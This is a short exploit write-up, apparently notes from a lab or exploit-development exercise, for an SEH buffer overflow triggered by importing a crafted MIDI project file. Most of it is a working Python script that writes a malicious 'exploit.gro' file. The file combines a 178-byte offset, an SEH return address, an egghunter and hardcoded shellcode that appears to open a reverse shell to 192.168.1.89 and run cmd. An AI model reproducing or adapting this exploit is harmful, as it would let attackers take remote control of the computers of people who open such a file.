badchar
omitted
\x00\x0a
offset
omitted
178
return address
seh
ommited
msacm32.drv 0x72d11f39
shellcode
more space
egghunter
!mona egghunter
shellcode
Limited space, so we use our hardcoded shellcode which was introduced before.
exploit.py
exploit.py1
2
3
4
5
6
7
8
9
10
11
12
13
14
| shellcode = "w00tw00t"
shellcode += "\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\x05\x11\x11\x11\x11\x05\xf0\xf1\xee\xee\x50\xb8\x55\x6a\xab\x71\xff\xd0\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x02\xb8\x6a\x8b\xab\x71\xff\xd0\x89\xc3\x68\xc0\xa8\x01\x59\xb8\x02\x01\x01\xbb\xfe\xcc\x50\x89\xe6\x31\xc0\xb0\x10\x50\x56\x53\xb8\x07\x4a\xab\x71\xff\xd0\x89\xdf\xba\x63\x63\x6d\x64\xc1\xea\x08\x52\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50\x52\x52\x51\x52\xb8\x6b\x23\x80\x7c\xff\xd0\x31\xc0\x50\xb8\xfa\xca\x81\x7c\xff\xd0"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
payload = "A" * (178 - 4 - len(shellcode)) + shellcode
payload += "\xeb\x06\x90\x90"
payload += "\x39\x1f\xd1\x72"
payload += egghunter
payload += "C" * 200
with open("exploit.gro", "w") as fp:
fp.write(payload)
|
proof
Project->Import MIDI...